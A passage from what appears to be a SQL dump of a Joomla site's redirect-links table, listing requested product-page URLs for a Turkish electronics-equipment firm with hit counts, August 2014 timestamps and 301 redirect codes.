00:00:00',301),(4128,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',9,0,'2014-08-21 09:56:11','0000-00-00 00:00:00',301),(4129,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',2,0,'2014-08-21 09:57:31','0000-00-00 00:00:00',301),(4130,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',1,0,'2014-08-21 10:05:25','0000-00-00 00:00:00',301),(4131,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',3,0,'2014-08-21 10:33:37','0000-00-00 00:00:00',301),(4132,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',3,0,'2014-08-21 10:45:33','0000-00-00 00:00:00',301),(4133,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157','','','',2,0,'2014-08-21 10:50:19','0000-00-00 00:00:00',301),(4134,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',6,0,'2014-08-21 10:59:13','0000-00-00 00:00:00',301),(4135,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',120,0,'2014-08-21 11:16:54','0000-00-00 00:00:00',301),(4136,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',1,0,'2014-08-21 11:25:11','0000-00-00 00:00:00',301),(4137,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',3,0,'2014-08-21 11:32:21','0000-00-00 00:00:00',301),(4138,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',5,0,'2014-08-21 11:38:43','0000-00-00 00:00:00',301),(4139,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',3,0,'2014-08-21 11:47:25','0000-00-00 00:00:00',301),(4140,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',3,0,'2014-08-21 12:18:53','0000-00-00 00:00:00',301),(4141,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',6,0,'2014-08-21 13:43:01','0000-00-00 00:00:00',301),(4142,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',3,0,'2014-08-21 14:11:29','0000-00-00 00:00:00',301),(4143,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',11,0,'2014-08-21 14:21:29','0000-00-00 00:00:00',301),(4144,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',20,0,'2014-08-21 14:45:50','0000-00-00 00:00:00',301),(4145,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',3,0,'2014-08-21 15:16:22','0000-00-00 00:00:00',301),(4146,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',3,0,'2014-08-21 15:26:27','0000-00-00 00:00:00',301),(4147,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',3,0,'2014-08-21 15:27:32','0000-00-00 00:00:00',301),(4148,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',6,0,'2014-08-21 15:31:27','0000-00-00 00:00:00',301),(4149,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',1,0,'2014-08-21 15:38:26','0000-00-00 00:00:00',301),(4150,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',2,0,'2014-08-21 15:39:56','0000-00-00 00:00:00',301),(4151,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',3,0,'2014-08-21 15:52:54','0000-00-00 00:00:00',301),(4152,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',3,0,'2014-08-21 16:09:41','0000-00-00 00:00:00',301),(4153,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',2,0,'2014-08-21 16:25:31','0000-00-00 00:00:00',301),(4154,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',1,0,'2014-08-21 16:52:37','0000-00-00 00:00:00',301),(4155,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',6,0,'2014-08-21 17:20:35','0000-00-00 00:00:00',301),(4156,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',7,0,'2014-08-21 18:20:48','0000-00-00 00:00:00',301),(4157,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',2,0,'2014-08-21 18:32:54','0000-00-00 00:00:00',301),(4158,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',10,0,'2014-08-21 18:56:15','0000-00-00 00:00:00',301),(4159,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154','','','',1,0,'2014-08-21 18:58:25','0000-00-00 00:00:00',301),(4160,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',5,0,'2014-08-21 19:32:55','0000-00-00 00:00:00',301),(4161,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',5,0,'2014-08-21 19:43:09','0000-00-00 00:00:00',301),(4162,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',1,0,'2014-08-21 19:51:40','0000-00-00 00:00:00',301),(4163,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',3,0,'2014-08-21 20:52:55','0000-00-00 00:00:00',301),(4164,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',1,0,'2014-08-21 21:14:06','0000-00-00 00:00:00',301),(4165,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',2,0,'2014-08-21 22:03:27','0000-00-00 00:00:00',301),(4166,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',13,0,'2014-08-21 22:41:59','0000-00-00 00:00:00',301),(4167,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',1,0,'2014-08-21 22:52:06','0000-00-00 00:00:00',301),(4168,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',5,0,'2014-08-21 23:10:31','0000-00-00 00:00:00',301),(4169,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',8,0,'2014-08-21 23:16:03','0000-00-00 00:00:00',301),(4170,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',3,0,'2014-08-21 23:37:42','0000-00-00 00:00:00',301),(4171,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',5,0,'2014-08-21 23:54:08','0000-00-00 00:00:00',301),(4172,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',12,0,'2014-08-22 00:07:02','0000-00-00 00:00:00',301),(4173,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',1,0,'2014-08-22 00:26:31','0000-00-00 00:00:00',301),(4174,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',5,0,'2014-08-22 00:29:25','0000-00-00 00:00:00',301),(4175,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',5,0,'2014-08-22 00:43:25','0000-00-00 00:00:00',301),(4176,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',2,0,'2014-08-22 01:56:37','0000-00-00 00:00:00',301),(4177,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',1,0,'2014-08-22 02:33:07','0000-00-00 00:00:00',301),(4178,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',5,0,'2014-08-22 03:52:53','0000-00-00 00:00:00',301),(4179,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',1,0,'2014-08-22 04:06:27','0000-00-00 00:00:00',301),(4180,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',3,0,'2014-08-22 04:17:54','0000-00-00 00:00:00',301),(4181,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',3,0,'2014-08-22 04:27:54','0000-00-00 00:00:00',301),(4182,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',2,0,'2014-08-22 04:39:35','0000-00-00 00:00:00',301),(4183,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',6,0,'2014-08-22 04:43:41','0000-00-00 00:00:00',301),(4184,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143','','','',2,0,'2014-08-22 05:22:53','0000-00-00 00:00:00',301),(4185,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',3,0,'2014-08-22 06:51:06','0000-00-00 00:00:00',301),(4186,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',6,0,'2014-08-22 07:02:01','0000-00-00 00:00:00',301),(4187,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',1,0,'2014-08-22 07:16:49','0000-00-00 00:00:00',301),(4188,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',4,0,'2014-08-22 07:17:54','0000-00-00 00:00:00',301),(4189,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',3,0,'2014-08-22 07:29:55','0000-00-00 00:00:00',301),(4190,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=0&lang=en','','','',1,0,'2014-08-22 09:59:54','0000-00-00 00:00:00',301),(4191,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',4,0,'2014-08-22 09:59:59','0000-00-00 00:00:00',301),(4192,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',2,0,'2014-08-22 10:37:39','0000-00-00 00:00:00',301),(4193,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',4,0,'2014-08-22 10:42:21','0000-00-00 00:00:00',301),(4194,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',1,0,'2014-08-22 11:10:51','0000-00-00 00:00:00',301),(4195,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',1,0,'2014-08-22 11:14:34','0000-00-00 00:00:00',301),(4196,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164','','','',7,0,'2014-08-22 11:15:34','0000-00-00 00:00:00',301),(4197,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',4,0,'2014-08-22 11:15:47','0000-00-00 00:00:00',301),(4198,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-22 11:25:36','0000-00-00 00:00:00',301),(4199,'http://www.3s-technologies.com.tr/index.php/en/egn?lang=en&gclid=CKHEh-3ppsACFUjHtAodqEMALw','','','',1,0,'2014-08-22 12:03:09','0000-00-00 00:00:00',301),(4200,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',3,0,'2014-08-22 12:08:17','0000-00-00 00:00:00',301),(4201,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',2,0,'2014-08-22 12:40:00','0000-00-00 00:00:00',301),(4202,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',3,0,'2014-08-22 12:43:42','0000-00-00 00:00:00',301),(4203,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',3,0,'2014-08-22 12:50:41','0000-00-00 00:00:00',301),(4204,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=168&Itemid=58','','','',2,0,'2014-08-22 13:04:07','0000-00-00 00:00:00',301),(4205,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',2,0,'2014-08-22 13:09:09','0000-00-00 00:00:00',301),(4206,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',3,0,'2014-08-22 13:09:23','0000-00-00 00:00:00',301),(4207,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',2,0,'2014-08-22 13:15:15','0000-00-00 00:00:00',301),(4208,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',1,0,'2014-08-22 13:16:15','0000-00-00 00:00:00',301),(4209,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=60&Itemid=164','','','',5,0,'2014-08-22 13:24:32','0000-00-00 00:00:00',301),(4210,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',3,0,'2014-08-22 13:59:14','0000-00-00 00:00:00',301),(4211,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',5,0,'2014-08-22 14:08:13','0000-00-00 00:00:00',301),(4212,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',11,0,'2014-08-22 14:32:01','0000-00-00 00:00:00',301),(4213,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',4,0,'2014-08-22 14:41:59','0000-00-00 00:00:00',301),(4214,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',6,0,'2014-08-22 14:42:17','0000-00-00 00:00:00',301),(4215,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',8,0,'2014-08-22 14:43:07','0000-00-00 00:00:00',301),(4216,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',2,0,'2014-08-22 14:49:00','0000-00-00 00:00:00',301),(4217,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',2,0,'2014-08-22 14:52:56','0000-00-00 00:00:00',301),(4218,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',6,0,'2014-08-22 15:00:48','0000-00-00 00:00:00',301),(4219,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',2,0,'2014-08-22 15:08:40','0000-00-00 00:00:00',301),(4220,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',1,0,'2014-08-22 15:21:54','0000-00-00 00:00:00',301),(4221,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',6,0,'2014-08-22 15:36:15','0000-00-00 00:00:00',301),(4222,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',5,0,'2014-08-22 15:38:17','0000-00-00 00:00:00',301),(4223,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',3,0,'2014-08-22 16:23:04','0000-00-00 00:00:00',301),(4224,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',4,0,'2014-08-22 16:24:55','0000-00-00 00:00:00',301),(4225,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',2,0,'2014-08-22 16:26:47','0000-00-00 00:00:00',301),(4226,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',3,0,'2014-08-22 16:32:20','0000-00-00 00:00:00',301),(4227,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=114&Itemid=124','','','',1,0,'2014-08-22 16:58:45','0000-00-00 00:00:00',301),(4228,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',4,0,'2014-08-22 17:55:57','0000-00-00 00:00:00',301),(4229,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',2,0,'2014-08-22 17:57:42','0000-00-00 00:00:00',301),(4230,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',2,0,'2014-08-22 17:59:33','0000-00-00 00:00:00',301),(4231,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default','','','',2,0,'2014-08-22 18:16:15','0000-00-00 00:00:00',301),(4232,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',2,0,'2014-08-22 18:34:49','0000-00-00 00:00:00',301),(4233,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',2,0,'2014-08-22 18:55:13','0000-00-00 00:00:00',301),(4234,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',8,0,'2014-08-22 19:10:28','0000-00-00 00:00:00',301),(4235,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',1,0,'2014-08-22 19:33:48','0000-00-00 00:00:00',301),(4236,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',1,0,'2014-08-22 20:07:26','0000-00-00 00:00:00',301),(4237,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',6,0,'2014-08-22 20:15:05','0000-00-00 00:00:00',301),(4238,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',1,0,'2014-08-22 21:31:20','0000-00-00 00:00:00',301),(4239,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',1,0,'2014-08-22 21:42:11','0000-00-00 00:00:00',301),(4240,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',42,0,'2014-08-22 22:06:16','0000-00-00 00:00:00',301),(4241,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144','','','',6,0,'2014-08-22 22:09:08','0000-00-00 00:00:00',301),(4242,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',1,0,'2014-08-22 22:15:12','0000-00-00 00:00:00',301),(4243,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',2,0,'2014-08-22 22:57:04','0000-00-00 00:00:00',301),(4244,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',1,0,'2014-08-22 23:10:14','0000-00-00 00:00:00',301),(4245,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=tr','','','',2,0,'2014-08-23 00:38:35','0000-00-00 00:00:00',301),(4246,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',3,0,'2014-08-23 01:23:14','0000-00-00 00:00:00',301),(4247,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','','',7,0,'2014-08-23 01:32:30','0000-00-00 00:00:00',301),(4248,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120','','','',5,0,'2014-08-23 01:33:13','0000-00-00 00:00:00',301),(4249,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',1,0,'2014-08-23 01:33:20','0000-00-00 00:00:00',301),(4250,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',4,0,'2014-08-23 03:07:08','0000-00-00 00:00:00',301),(4251,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',1,0,'2014-08-23 05:31:47','0000-00-00 00:00:00',301),(4252,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121','','','',2,0,'2014-08-23 05:48:34','0000-00-00 00:00:00',301),(4253,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125','','','',2,0,'2014-08-23 05:55:59','0000-00-00 00:00:00',301),(4254,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',1,0,'2014-08-23 06:30:18','0000-00-00 00:00:00',301),(4255,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',3,0,'2014-08-23 07:58:07','0000-00-00 00:00:00',301),(4256,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',3,0,'2014-08-23 08:39:35','0000-00-00 00:00:00',301),(4257,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',3,0,'2014-08-23 08:52:16','0000-00-00 00:00:00',301),(4258,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',7,0,'2014-08-23 09:14:21','0000-00-00 00:00:00',301),(4259,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',5,0,'2014-08-23 09:28:21','0000-00-00 00:00:00',301),(4260,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',5,0,'2014-08-23 09:36:27','0000-00-00 00:00:00',301),(4261,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',1,0,'2014-08-23 09:37:22','0000-00-00 00:00:00',301),(4262,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',5,0,'2014-08-23 10:08:15','0000-00-00 00:00:00',301),(4263,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=71&Itemid=79','','https://www.google.com.tr/','',3,0,'2014-08-23 10:29:20','0000-00-00 00:00:00',301),(4264,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',6,0,'2014-08-23 10:53:13','0000-00-00 00:00:00',301),(4265,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=1&layout=blog&lang=tr','','','',2,0,'2014-08-23 11:34:15','0000-00-00 00:00:00',301),(4266,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-08-23 14:41:43','0000-00-00 00:00:00',301),(4267,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',1,0,'2014-08-23 15:03:23','0000-00-00 00:00:00',301),(4268,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147','','','',3,0,'2014-08-23 15:08:57','0000-00-00 00:00:00',301),(4269,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default','','','',2,0,'2014-08-23 15:34:56','0000-00-00 